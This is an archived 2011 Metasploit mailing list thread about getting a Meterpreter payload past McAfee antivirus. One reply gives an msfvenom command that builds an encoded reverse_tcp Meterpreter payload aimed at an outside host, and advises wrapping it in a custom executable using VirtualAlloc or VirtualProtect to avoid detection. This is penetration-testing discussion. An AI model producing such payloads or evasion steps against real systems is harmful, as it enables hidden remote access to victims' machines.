Home page logo
/

metasploit logo Metasploit mailing list archives

Re: Yet another AV bypassing question
From: scriptjunkie <scriptjunkie1 () googlemail com>
Date: Fri, 24 Jun 2011 22:28:57 -0500

In short, no it's probably not the DLL. The DLL is not embedded in an
executable that Metasploit generates. Try generating a c version of
the payload:
ruby msfvenom -p windows/meterpreter/reverse_tcp -f c -e
x86/shikata_ga_nai LHOST=1.2.3.4
and create your own exe or modify the source of an existing one to run
that code. You will need to make it executable before it can be
executed as code, look up VirtualAlloc or VirtualProtect. There are
plenty of other ways, but that's my favorite. See http://j.mp/mjyb8e
if you want to see what goes into an MSF generated exe.

On Fri, Jun 24, 2011 at 6:55 PM, Average SecurityGuy
<averagesecurityguy () gmail com> wrote:
Have you looked at this
http://dev.metasploit.com/redmine/projects/framework/wiki/Using_a_Custom_Executable_to_Bypass_AV?

On Fri, Jun 24, 2011 at 5:22 PM, Jason Hawks <jason.hawks0 () gmail com> wrote:

Hello list,

As many of you, I'm trying to bypass my AV but I'm not lucky with the
metasploit encoders anymore.

My Question is simple (but I don't know about the answer yet).

Does modifying and recompiling meterpreter source code (with spread
dummy instructions and a lot of try-and-error attempt) could help me ?
or the main problem is not in meterpreter DLL but somewhere else ?

Actually I got a try modifying the source code of meterpreter (using
Visual Studio Express), but it didn't change anything. Therefore, I'm
wondering if it's just a matter of tries or if I'm wasting my time.
Am I looking in the right direction ?

For information, I'm playing with McAfee 8.X right now.

Thank you very much for your lights. Any other tips are welcome.


Cheers,
Jason
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework





-- 
scriptjunkie
http://www.scriptjunkie.us/
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]